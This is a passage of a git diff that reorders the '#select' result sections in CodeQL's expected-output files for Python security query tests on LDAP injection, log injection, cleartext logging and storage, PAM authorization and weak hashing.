| ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select 
diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected index 67274311bf42..fd9b5fe6bb65 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected @@ -1,8 +1,3 @@ -#select -| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | edges | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | provenance | | | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | LogInjectionBad.py:17:12:17:18 | ControlFlowNode for request | provenance | | 
@@ -49,3 +44,8 @@ nodes | LogInjectionBad.py:35:12:35:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths +#select +| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected index 99114d85cfbd..8031d3070c94 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected +++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected 
@@ -1,5 +1,3 @@ -#select -| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | edges | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:4:26:4:32 | ControlFlowNode for request | provenance | | | pam_test.py:4:26:4:32 | ControlFlowNode for request | pam_test.py:71:16:71:22 | ControlFlowNode for request | provenance | | @@ -22,3 +20,5 @@ nodes | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | semmle.label | ControlFlowNode for pam_authenticate() | | pam_test.py:76:31:76:36 | ControlFlowNode for handle | semmle.label | ControlFlowNode for handle | subpaths +#select +| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected index 47f27dbc5f27..5da1b60eee12 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected 
@@ -1,28 +1,3 @@ -#select -| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. 
| test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | -| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | -| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. 
| test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | -| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | -| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | -| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | -| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | -| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | -| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. 
| test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | -| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | -| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | -| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | -| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | -| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | -| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. 
| test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | edges | test.py:19:5:19:12 | ControlFlowNode for password | test.py:20:48:20:55 | ControlFlowNode for password | provenance | | | test.py:19:5:19:12 | ControlFlowNode for password | test.py:22:58:22:65 | ControlFlowNode for password | provenance | | 
@@ -92,3 +67,28 @@ nodes | test.py:73:15:73:17 | ControlFlowNode for ccn | semmle.label | ControlFlowNode for ccn | | test.py:74:15:74:22 | ControlFlowNode for user_ccn | semmle.label | ControlFlowNode for user_ccn | subpaths +#select +| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. 
| test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | +| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | +| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. 
| test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | +| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | +| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | +| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | +| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | +| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | +| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. 
| test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | +| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | +| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | +| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | +| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | +| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | +| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. | test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | 
diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected index 66c192b89e03..588cfae32ef5 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected @@ -1,7 +1,3 @@ -#select -| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | test.py:9:5:9:12 | ControlFlowNode for password | test.py:12:21:12:28 | ControlFlowNode for password | provenance | | | test.py:9:5:9:12 | ControlFlowNode for password | test.py:13:22:13:45 | ControlFlowNode for Attribute() | provenance | | 
@@ -14,3 +10,7 @@ nodes | test.py:13:22:13:45 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:15:26:15:33 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths +#select +| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected index ed748c70df3e..ea41c1ba6516 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected 
@@ -1,8 +1,3 @@ -#select -| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | provenance | | | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | provenance | | 
@@ -29,3 +24,8 @@ nodes | test.py:18:18:18:32 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | test.py:19:25:19:29 | ControlFlowNode for lines | semmle.label | ControlFlowNode for lines | subpaths +#select +| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected index ae081dd1aa05..1027fbf4963c 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected 
@@ -1,16 +1,3 @@ -#select -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. 
| test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | 